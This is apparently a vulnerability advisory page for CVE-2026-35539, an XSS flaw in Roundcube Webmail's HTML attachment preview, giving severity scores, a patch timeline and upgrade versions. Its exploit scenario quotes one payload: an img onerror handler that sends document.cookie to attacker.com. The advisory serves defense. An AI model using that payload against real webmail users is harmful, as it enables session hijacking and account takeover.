What is the CVSS score of CVE-2026-35539?

CVE-2026-35539 has a CVSS 3.1 base score of 6.1 (Medium). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N. EPSS exploitation probability: 0.0%.

Is there a patch available for CVE-2026-35539?

Yes, a patch is available for CVE-2026-35539. Update the affected software to the latest version immediately.

Webmail CVE-2026-35539

EUVD-2026-18581 MEDIUM

Cross-site Scripting (XSS) (CWE-79)

2026-04-03 mitre

GHSA-x4q5-8j5g-hpjc

XSS Webmail

6.1

CVSS 3.1 · NVD

Severity by source

NVD PRIMARY

6.1 MEDIUM

AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

Required

Scope

Changed

Confidentiality

Low

Integrity

Low

Availability

None

Lifecycle Timeline

Patch released

Apr 04, 2026 - 08:30 nvd

Patch available

EUVD ID Assigned

Apr 03, 2026 - 04:30 euvd

EUVD-2026-18581

Analysis Generated

Apr 03, 2026 - 04:30 vuln.today

CVE Published

Apr 03, 2026 - 03:39 nvd

MEDIUM 6.1

DescriptionCVE.org

An issue was discovered in Roundcube Webmail before 1.5.14 and 1.6.14. XSS exists because of insufficient HTML attachment sanitization in preview mode. A victim must preview a text/html attachment.

AnalysisAI

Cross-site scripting (XSS) in Roundcube Webmail before versions 1.5.14 and 1.6.14 allows remote attackers to inject malicious scripts via insufficient HTML sanitization in text/html attachment preview mode. An authenticated user must preview a malicious text/html attachment to trigger the vulnerability, enabling attackers to steal session cookies, redirect users, or perform actions on behalf of the victim. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Vulnerability AssessmentAI

Risk Assessment	The CVSS vector (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) indicates a network-accessible vulnerability with low attack complexity and no privilege requirement, but requiring user interaction (preview action). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	A threat actor sends a specially crafted email to a Roundcube Webmail user with a text/html attachment containing embedded JavaScript (e.g., <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">). When the victim previews the attachment within Roundcube, the malicious script executes in the context of the webmail application, allowing the attacker to steal the user's session cookie, redirect them to a phishing page, or perform email operations on their behalf. …
Remediation	Vendor-released patches are available: upgrade Roundcube Webmail to version 1.5.14 or later (1.5.x branch) or 1.6.14 or later (1.6.x branch). … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2026-35539 vulnerability details – vuln.today

Back